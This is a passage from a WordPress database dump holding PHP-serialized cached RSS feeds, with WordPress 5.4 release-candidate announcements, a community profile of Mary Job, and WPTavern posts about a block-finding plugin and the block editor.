31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time! You can test the WordPress 5.4 release candidate in two ways: Try the WordPress Beta Tester plugin (choose the “bleeding edge nightlies” option) […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Francesca Marano\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2395:\"\n

The fourth release candidate for WordPress 5.4 is live!

\n\n\n\n

WordPress 5.4 is currently scheduled to land on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time!

\n\n\n\n

You can test the WordPress 5.4 release candidate in two ways:

\n\n\n\n\n\n\n\n

For details about what to expect in WordPress 5.4, please see the first release candidate post.

\n\n\n\n

RC4 commits the new About page and updates the editor packages.

\n\n\n\n

Plugin and Theme Developers

\n\n\n\n

Please test your plugins and themes against WordPress 5.4 and update the Tested up to version in the readme to 5.4. The priority in testing is compatibility. If you find issues, please be sure to post to the support forums so we can figure them out before the final release.

\n\n\n\n

The WordPress 5.4 Field Guide is also out! It’s your source for details on all the major changes.

\n\n\n\n

How to Help

\n\n\n\n

Do you speak a language besides English? Help us translate WordPress into more than 100 languages!

\n\n\n\n

If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, file one on WordPress Trac, where you can also find a list of known bugs.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8444\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:60:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"WordPress 5.4 RC3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/2020/03/wordpress-5-4-rc3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 17 Mar 2020 21:24:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8432\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:384:\"The third release candidate for WordPress 5.4 is now available! WordPress 5.4 is currently scheduled to be released on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time! There are two ways to test the WordPress 5.4 release candidate: Try the WordPress Beta Tester plugin (choose the “bleeding edge […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Baumwald\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4104:\"\n

The third release candidate for WordPress 5.4 is now available!

\n\n\n\n

WordPress 5.4 is currently scheduled to be released on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time!

\n\n\n\n

There are two ways to test the WordPress 5.4 release candidate:

\n\n\n\n\n\n\n\n

For details about what to expect in WordPress 5.4, please see the first release candidate post.

\n\n\n\n

RC3 addresses improvements to the new About page and 8 fixes for the following bugs and regressions:

\n\n\n\n\n\n\n\n

Plugin and Theme Developers

\n\n\n\n

Please test your plugins and themes against WordPress 5.4 and update the Tested up to version in the readme to 5.4. If you find compatibility problems, please be sure to post to the support forums so we can figure those out before the final release.

\n\n\n\n

The WordPress 5.4 Field Guide has also been published, which details the major changes.

\n\n\n\n

How to Help

\n\n\n\n

Do you speak a language other than English? Help us translate WordPress into more than 100 languages!

\n\n\n\n

If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, file one on WordPress Trac, where you can also find a list of known bugs.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8432\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:60:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"WordPress 5.4 RC2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/2020/03/wordpress-5-4-rc2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Mar 2020 21:40:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8422\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:385:\"The second release candidate for WordPress 5.4 is now available! WordPress 5.4 is currently scheduled to be released on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time! There are two ways to test the WordPress 5.4 release candidate: Try the WordPress Beta Tester plugin (choose the “bleeding edge […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Francesca Marano\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3311:\"\n

The second release candidate for WordPress 5.4 is now available!

\n\n\n\n

WordPress 5.4 is currently scheduled to be released on March 31 2020, and we need your help to get there—if you haven’t tried 5.4 yet, now is the time!

\n\n\n\n

There are two ways to test the WordPress 5.4 release candidate:

\n\n\n\n\n\n\n\n

For details about what to expect in WordPress 5.4, please see the first release candidate post.

\n\n\n\n

RC2 addresses improvements to the new About page and 5 fixes for the following bugs and regressions:

\n\n\n\n\n\n\n\n

Plugin and Theme Developers

\n\n\n\n

Please test your plugins and themes against WordPress 5.4 and update the Tested up to version in the readme to 5.4. If you find compatibility problems, please be sure to post to the support forums so we can figure those out before the final release.

\n\n\n\n

The WordPress 5.4 Field Guide has also been published, which details the major changes.

\n\n\n\n

How to Help

\n\n\n\n

Do you speak a language other than English? Help us translate WordPress into more than 100 languages!

\n\n\n\n

If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, file one on WordPress Trac, where you can also find a list of known bugs.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8422\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:79:\"\n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"People of WordPress: Mary Job\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/news/2020/03/people-of-wordpress-mary-job/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/news/2020/03/people-of-wordpress-mary-job/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Mar 2020 16:30:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"heropress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:10:\"Interviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8406\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:189:\"In the March edition of our \"People of WordPress\" series, you\'ll find out how Mary Job grew from a timid, curious cat into a public speaker and organizer of WordPress Meetups and WordCamps.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Yvette Sonneveld\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:9720:\"\n

You’ve probably heard that WordPress is open-source software, and may know that it’s created and run by volunteers. WordPress enthusiasts share many examples of how WordPress changed people’s lives for the better. This monthly series shares some of those lesser-known, amazing stories. 

\n\n\n\n

How it all began

\n\n\n\n
\"Mary
Mary Job at WordCamp Kampala 2020
\n\n\n\n

Mary remembers when cybercafés started trending in Nigeria. She had just finished high school and was awaiting her results for admission to university. She spent all of her time (10 hours a day) and all of her pocket money buying bulk time online at cafes. All the way through university that was true, until in 2008 she graduated with a degree in philosophy and bought her own computer and modem.

\n\n\n\n

She started blogging in 2009. Initially, she tried out Blogger, Hubpages, and WordPress—but found WordPress too complicated. 

\n\n\n\n

Growing up as a timid but curious cat

\n\n\n\n

Mary is one of four kids, and the only girl among her siblings. Throughout her childhood she felt shy, even though others didn’t always see her that way.

\n\n\n\n

When she first started her personal blog, it was mostly an opportunity for her to speak her mind where she was comfortable. Blogging gave her a medium to express her thoughts and with every new post she became a better writer.

\n\n\n\n

Rediscovering WordPress

\n\n\n\n

After completing a postgraduate diploma in mass communication, Mary started a Masters degree in Information Management. This required a three month internship. She decided to volunteer in Ghana in 2015 at the headquarters of the Salesians of Don Bosco in West Africa (SDBAFW) where her uncle was based.

\n\n\n\n

While she was there, her uncle asked Mary why she was not blogging on WordPress, which also happened to be the software the organisation used. She explained how difficult and complicated it was so he shared a group of beginner-level tutorial videos with her.

\n\n\n\n

After two weeks of watching those videos, she started to realize she could have a full-time career doing this. So she immediately joined a number of online training groups so she could learn everything.

\n\n\n\n

I saw a lot of people earning an income from things I knew and did for the fun of it. I found myself asking why I had not turned my passion into a business.

Mary Job
\n\n\n\n

Not long after that, she was contacted by a website editor who was impressed by her blog. With the information available online for WordPress, she was able to learn everything she needed to improve and redesign a site for what turned into her first client.

\n\n\n\n
\"\"
Mary’s home office in 2016
\n\n\n\n

I visited the WordPress.org showcase and was wowed with all the good things I could do with WordPress.

Mary Job
\n\n\n\n

In 2016 after a year of deep WordPress learning, she had fallen in love with the CMS and wanted to give back to the WordPress open source project

\n\n\n\n

She volunteered to help the Community team. And when she moved to Lagos later that year, she discovered there was an active WordPress Meetup community. This started her journey toward becoming a WordPress Meetup Co-organizer and a Global Community Team Deputy.

\n\n\n\n

Today the Nigerian WordPress community continues to grow, as has the Lagos WordPress Meetup group. The first Nigerian WordCamp took place in Lagos in 2018 and a 2020 event is being planned. A local WordPress community also developed in Mary’s hometown in Ijebu.

\n\n\n\n

I have made great friends and met co-organizers in the community who are dedicated to building and sharing their WordPress knowledge with the community like I am.

Mary Job
\n\n\n\n

What did Mary gain from using and contributing to WordPress?

\n\n\n\n\n\n\n\n
\"\"
Mary moderating a panel at WordCamp Lagos in 2019
\n\n\n\n

Essentially, the community has taught me to be a better communicator, and a better person. I’ve made friends across the world that have become like a family to me.

Mary Job
\n\n\n\n

She now runs a village hub in Ijebu,  where she teaches girls digital skills and WordPress as a way of giving back to her town.

\n\n\n\n

Since she started on this journey, Mary has gotten a fulltime job supporting a WordPress plugin. She’s also become a Community Team Rep and continues to build and foster communities.

\n\n\n\n

Mary’s advice to others

\n\n\n\n

Always seek to understand the basics of whatever knowledge you seek. Never jump in too fast, wanting to spiral to the top while ignoring the learning curve. You will likely crash down effortlessly if you do so, and would have learned nothing.

Mary Job
\n\n\n\n

Contributors

\n\n\n\n

Thanks to Alison Rothwell (@wpfiddlybits), Yvette Sonneveld (@yvettesonneveld), Abha Thakor (@webcommsat), Josepha Haden (@chanthaboune), Topher DeRosia (@topher1kenobe). Thank you to Mary Job (@maryojob) for sharing her #ContributorStory.

\n\n\n\n
\"\"
\n\n\n\n

This post is based on an article originally published on HeroPress.com, a community initiative created by Topher DeRosia. HeroPress highlights people in the WordPress community who have overcome barriers and whose stories would otherwise go unheard.

\n\n\n\n

Meet more WordPress community members over at HeroPress.com!

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/03/people-of-wordpress-mary-job/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"18\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8406\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n hourly \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n 1 \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 05 May 2020 07:25:28 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Mon, 04 May 2020 22:49:47 GMT\";s:4:\"link\";s:63:\"; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";}}s:5:\"build\";s:14:\"20130911133210\";}','no'),(136,'_transient_timeout_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1588706729','no'),(137,'_transient_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1588663529','no'),(138,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1588706729','no'),(139,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"WPTavern: Find My Blocks Plugin Shows All Blocks in Use on a WordPress Site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98953\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:195:\"https://wptavern.com/find-my-blocks-plugin-shows-all-blocks-in-use-on-a-wordpress-site?utm_source=rss&utm_medium=rss&utm_campaign=find-my-blocks-plugin-shows-all-blocks-in-use-on-a-wordpress-site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3144:\"

How do you know what blocks are in use on a WordPress site? I recently saw a tweet asking this question in regards to knowing whether it is safe to turn off a plugin. This seems like it could become a common question, especially for those who have hundreds or thousands of blog posts as well as those using WordPress as a CMS.

\n\n\n\n
\n

How hard would it be to create a plugin that let\'s me know how many and which blocks I\'m using site wide? Sometimes I wonder if I can deactivate a block plugin but I don\'t know if I\'m using a block it provides.

— Nick Hamze (@NickHamze) April 23, 2020
\n
\n\n\n\n

When looking at content in the editor, it isn’t immediately evident which blocks are in use. You can click on the block navigation at the top of the editor, but that will only show you the blocks in use on that particular page. If you have a lot of plugins installed and many pages of content to wade through, figuring out if it’s safe to remove a plugin can be a time-consuming process.

\n\n\n\n

Fortunately, there is already a plugin that will give you a quick overview of where blocks are being used on your site. Find My Blocks is the one that was suggested to Nick Hamze in response to the question in his tweet. I had not heard of it before, so I took it for a test drive today.

\n\n\n\n

Find My Blocks is basically a utility plugin that lists the blocks being used on your WordPress site, along with the posts/pages where they are in use. It includes core blocks and blocks from third-party plugins. The plugin’s settings also give the option to sort the block menu display alphabetically or by most/least popular.

\n\n\n\n
\n\n\n\n

Frontend developer Eddy Sims created Find My Blocks to solve one of his own problems and released it on WordPress.org in January.

\n\n\n\n

“I was working on a site that required a few custom Gutenberg blocks,” Sims said. “After a week, updating became a hassle. I didn’t know where the blocks were used. Find My Blocks is a plugin I created to hopefully help someone else with this issue.” So far it has received several five-star reviews in the plugin directory.

\n\n\n\n

“We’ve been using this plugin to help us figure out where we’ve used blocks on pages so we can deprecate them and replace them with shiny new blocks!” WordPress developer Tammy Lee said. “This plugin makes tracking down blocks really easy! I don’t want to think about how much time it would have taken us, otherwise.”

\n\n\n\n

Find My Blocks is a plugin you may want to add to your favorites on WordPress.org for the next time you inherit a site that you didn’t build, or for cleaning out your own installed plugins.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 May 2020 22:54:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: The Future of WordPress: The Block Editor Is Here to Stay\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99271\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:177:\"https://wptavern.com/the-future-of-wordpress-the-block-editor-is-here-to-stay?utm_source=rss&utm_medium=rss&utm_campaign=the-future-of-wordpress-the-block-editor-is-here-to-stay\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6577:\"

It is inevitable that when we publish a story on the Tavern that is remotely related to the block editor or the Gutenberg project, we receive negative comments. Despite sprinting along in its second year as part of core WordPress, there are still those who liken posts on the editor to Soviet-style mind manipulation and propaganda for certain unnamed companies.

\n\n\n\n

It is not all negative. Far more comments are from people who are ecstatic about the current editor and the upcoming features that will expand the block system to other areas of WordPress.

\n\n\n\n

However, I felt the need to address a recent request that we stop covering the block editor. While I cannot speak for our entire staff, there are two simple truths about why I write about blocks.

\n\n\n\n

Truth #1: Blocks are Here to Stay

\n\n\n\n

